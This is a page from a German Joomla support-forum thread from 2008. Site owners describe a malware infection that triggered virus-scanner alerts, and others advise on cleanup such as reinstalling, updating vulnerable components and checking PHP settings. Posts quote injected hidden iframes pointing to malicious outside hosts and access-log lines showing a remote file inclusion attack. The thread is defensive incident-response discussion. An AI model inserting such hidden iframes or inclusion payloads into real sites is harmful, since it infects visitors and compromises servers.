Seite 2 von 2 ErsteErste 1 2
Ergebnis 11 bis 18 von 18

Thema: Virescanneralarm bei Seitenaufruf

  1. #11
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    13.179
    Bedankte sich
    201
    Erhielt 3.280 Danksagungen
    in 2.996 Beiträgen

    Standard

    Bei mir bringt die Suche u.a. diesen Link: http://www.joomlaportal.de/sicherhei...stats-php.info

    Edit: Ups, sehe gerade, daß Du diesen Thread ja schon gefunden hast. Hatte jetzt kurzzeitig die Ü verloren in dem Fensterwirrwarr.

    Und nein, mit der Deaktivierung des Moduls ist es nicht getan, da der Schadcode bereits implementiert wurde und auf das Modul nicht mehr angewiesen ist.

    Edit 2:
    rickkp hat alle nötigen Schritte genannt. Was genau ist denn unklar daran?
    Geändert von keraM (10.01.2008 um 18:49 Uhr) Grund: Edit
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  2. #12
    Neu an Board
    Registriert seit
    06.05.2007
    Ort
    Düsseldorf
    Beiträge
    7
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.
    Also, ich bin ebenfalls diesem Trojaner zum Opfer gefallen und habe allerdings in diesem Forum keine weiteren Hinweise zur "Entwanzung" gefunden. Daher poste ich meine eigenen Erfahrungen als Kammerjäger:

    Google half zuerst einmal mit einem Verweis auf diesen Beitrag
    Ein Blick in den Seitenquelltext führte zu der Erkenntnis, das die böse Zeile:
    Code:
    <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php”
    frameborder=”0″ height=”1″ width=”1″></iframe>
    durch die Anweisung
    Code:
    <?php mosLoadModules('left'); ?>
    im Template eingefügt wurde.
    Ein Blick in die Liste der Module, die auf der Position 'left' erscheinen sollen, führte dann schnell zu einem Eintrag 'Custom Module' mit dem Titel: 'Joomla Info'. Nachdem ich dieses Modul deaktiviert hatte, war die Wanze verschwunden.

    Es bleiben allerdings einige offene Fragen:
    • Wie konnte dieser Code von aussen eingeschleußt werden?
    • Wo in der Datenbank steht der Code?
    • War das 'Custom Module' schon vorher da oder wurde es erst durch den ´Befall´ eingeführt?
    • Kann ich verhindern, dass ich wieder von diesem Trojaner befallen werde?

    Fragen über Fragen.... Gruß, Peter
    Peter

  3. #13
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard

    Du wirst entweder unsichere Komponenten am laufen haben, die Rechte deiner Ordner und Dateien falsch gesetzt oder die allgemeinen Sicherheitsregeln zu register globals - magic quotes usw nicht beachtet haben.

    Schau dir meine Signatur an und dieses Forum Sicherheit.
    Vergleiche die Komponenten mit deinen installierten und befolge die Sicherheitshinweise die hier empfohlen werden.
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  4. #14
    Neu an Board
    Registriert seit
    06.05.2007
    Ort
    Düsseldorf
    Beiträge
    7
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von rickkp Beitrag anzeigen
    Du wirst entweder unsichere Komponenten am laufen haben, die Rechte deiner Ordner und Dateien falsch gesetzt oder die allgemeinen Sicherheitsregeln zu register globals - magic quotes usw nicht beachtet haben.
    Danke für die schnelle Antwort. Ich habe noch mal alles durchgecheckt und erst mal keine groben Schnitzer gefunden. Ich habe noch zusätzlich das erweiterte .htaccess eingebaut, möglicherweise hilft es.

    Zitat Zitat von rickkp Beitrag anzeigen
    Schau dir meine Signatur an und dieses Forum Sicherheit.
    Vergleiche die Komponenten mit deinen installierten und befolge die Sicherheitshinweise die hier empfohlen werden.
    OK, die Links sind hilfreich, bisher konnte ich allerdings nichts relevantes finden. Die einzige verdächtige Komponente wäre vielleicht Exposé, die habe ich aber nach einem Angriff im letzten Jahr auf dem neuesten Stand.

    Die logs zeigen einen verdächtigen Angriffsversuch, nämlich:
    Code:
    GET /index.php?option=http%3A%2F%2Fwww.nedkellypub.it%2Fconcerti%2Fdati%2Folukev%2Forawo%2F&amp;task=view&amp;id=19&amp;Itemid=34
    Auf welchen Exploit würde das deuten? Google hatte darauf keine Joomla bezügliche Antwort, die ich verstanden hätte. *grübel*
    Bei dem Versuch diese URL einzugeben, kam dann auch die Meldung "Restricted Access"

    Noch immer ein wenig unsicher... Peter
    Peter

  5. #15
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Wie lautet denn die ganze Zeile? Steht da ein "200" dahinter?

    An Deiner Stelle wäre ich sogar sehr besorgt, denn wenn es dem Angreifer einmal gelingt Dateien auf Deinem Webspace abzulegen dann wird er es vermutlich wieder tun können, solange die offensichtlich vorhandene Lücke weiterhin exisitiert. Da hilft meistens auch eine htaccess nicht weiter, da vermutlich schon einige php shells auf Deiner Seite lagern.

  6. #16
    Neu an Board
    Registriert seit
    06.05.2007
    Ort
    Düsseldorf
    Beiträge
    7
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von chw Beitrag anzeigen
    Wie lautet denn die ganze Zeile? Steht da ein "200" dahinter?
    Hier die Kopie einer Log-Zeile, mit einer 200 drin! .
    Code:
    "GET //index.php?option=http%3A%2F%2Fwww.xxx.com%2Far%2Farticles%2Fjed%2Fumut%2F&amp;task=view&amp;id=34&amp;Itemid=50 HTTP/1.1" 200 141 www.designwishes.de "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "-"
    Zitat Zitat von chw Beitrag anzeigen
    An Deiner Stelle wäre ich sogar sehr besorgt,
    Bin ich auch, daher meine hartnäckige Arbeit an der Sache!
    denn wenn es dem Angreifer einmal gelingt Dateien auf Deinem Webspace abzulegen dann wird er es vermutlich wieder tun können,
    Scheint 'ihm' gelungen zu sein. Im "Exposé ../img" Verzeichnis wurde ich dann fündig. Kann allerdings sein, das da noch Reste vom letzten Überfall drin waren.
    solange die offensichtlich vorhandene Lücke weiterhin exisitiert. Da hilft meistens auch eine htaccess nicht weiter, da vermutlich schon einige php shells auf Deiner Seite lagern.
    Habe daher Expose rausgeworfen, alles weggeräumt und neu installiert. Ich hatte 4.6.1 plus patch, jetzt ist 4.6.2 installiert. Naja bis zum mächsten Mal, ich habe leider noch keinen Ersatz für Expose.
    Ein Vergleich mit einer älteren Sicherung brachte auch tatsächlich Änderungen im Expose Verzeichnis zu Tage, andere Bereiche scheinen clean zu sein.

    Danke für die Hilfe.

    Peter (Jetzt ein wenig beruhigter... )
    Peter

  7. #17
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Zitat Zitat von SailingSmoky Beitrag anzeigen
    Scheint 'ihm' gelungen zu sein. Im "Exposé ../img" Verzeichnis wurde ich dann fündig. Kann allerdings sein, das da noch Reste vom letzten Überfall drin waren.
    Das löschend der offensichtlichen Hackerdateien alleine ist immer mit einer enormen unsicherheit verbunden ob da nicht doch eine Backdoor installiert ist.
    Daher gebe ich immer den Tip die komplette Seite zu löschen und neu aufzuspielen. Die Dateien die arbeit machen (Template usw.) von Hand überprüfen, genauso wie die DB.

    Poste mal den relevanten Teil (register_globals usw) Deiner php Konfiguration. Die 200 hinten an der Zeile besagt nur das der Aufruf erfolgreich war, ob es auch möglich war Code einzuschleußen lässt sich so nicht sagen.

  8. Erhielt Danksagungen von:


  9. #18
    p_t
    p_t ist offline
    War schon öfter hier
    Registriert seit
    04.12.2005
    Ort
    Schwalmstadt
    Beiträge
    122
    Bedankte sich
    34
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Standard

    Bei mir war wohl alphacontent 2.5.5 das Einfallstor. Es wurde ebenfalls ein Modul "Joomla Info" erstellt, welches dann den Code aus Beitrag 6 auf allen Seiten einfügte. Scheinbar wurde auch 'RG_EMULATION' in der globals.php auf 1 / ON gestellt.

    In components/com_alphacontent habe ich dann eine Datei gefunden, die dort nicht hingehört: alphacontent.inc.php. Knapp 2500 Zeilen Code, meine PHP Kenntnisse reichen aber nicht aus um zu sagen, was dieses Script alles macht...

    Nachtrag: Im Bereich des Footer meines Templates (firestarter) habe ich weiteren Code gefunden:

    <iframe src="http://in-in.in/in/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></

    Als ich die betroffene index.php im Dreamweaver geöffnet habe, ist mein Rechner automatisch runtergefahren und mit einer Boot Virus Warnung neu gestartet. Meine Empfehlung: Den Scheiß nur in einem reinen Text-Editor öffnen!

    Die befallenen Dateien hatten das selbe Datum in WS_FTP.

    Konfiguration: Joomla 1.0.12 mit alphacontent 2.5.5 (werde ich jetzt beides updaten)
    Angehängte Dateien

Seite 2 von 2 ErsteErste 1 2

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein